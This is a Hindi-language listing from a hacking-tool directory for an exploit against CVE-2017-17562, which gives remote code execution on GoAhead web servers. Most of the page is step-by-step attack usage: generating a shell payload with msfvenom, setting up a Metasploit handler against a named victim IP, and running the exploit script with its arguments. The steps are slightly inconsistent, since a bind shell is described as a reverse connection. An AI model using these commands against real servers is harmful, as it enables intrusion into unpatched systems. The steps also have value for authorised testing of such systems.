Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nu11pointer/goahead-rce-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubnu11pointer/goahead-rce-exploit

goahead-rce-exploit

CVE-2017-17562 भेद्यता के लिए एक्सप्लॉइट, जो GoAhead (< v3.6.5) पर RCE की अनुमति देता है यदि CGI सक्षम है और एक CGI प्रोग्राम डायनामिक रूप से लिंक किया गया है।

रिपॉजिटरी देखें
812 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

GoAhead वेब सर्वर 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' रिमोट कोड निष्पादन

CVE-2017-17562 भेद्यता के लिए एक्सप्लॉइट, जो GoAhead (< v3.6.5) पर RCE की अनुमति देता है, यदि CGI सक्षम है और एक CGI प्रोग्राम डायनामिक रूप से लिंक किया गया है।

उपयोग

root@kitploit:~
$ python3 exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]

आवश्यकताएँ

root@kitploit:~
$ python3 -m pip install -r requirements.txt

ध्यान दें!

आपको पहले पेलोड उत्पन्न करना और लिसनिंग कनेक्शन सेट करना होगा।
उदाहरण:
(हमलावर: 192.168.1.100 - पीड़ित: 192.168.1.200)

root@kitploit:~
$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337

फिर, दूसरे शेल में, आपको इस एक्सप्लॉइट को चलाना होगा ताकि पेलोड भेजा जा सके जो लिसनर के लिए रिवर्स कनेक्शन शुरू करेगा!

तर्क

root@kitploit:~
आवश्यक तर्क:
  --host HOST        GoAhead वेबसर्वर चलाने वाला होस्ट।
  --port PORT        GoAhead वेबसर्वर चलाने वाला पोर्ट। डिफ़ॉल्ट: 80
  --payload PAYLOAD  पेलोड का पथ।

वैकल्पिक तर्क:
  --ssl              होस्ट SSL का उपयोग कर रहा है।
  --cgi LIST         GoAhead सर्वर पर CGI स्क्रिप्ट खोजने के लिए पथों की सूची। डिफ़ॉल्ट: paths.lst

उदाहरण

root@kitploit:~
$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl
टूल डाउनलोड करें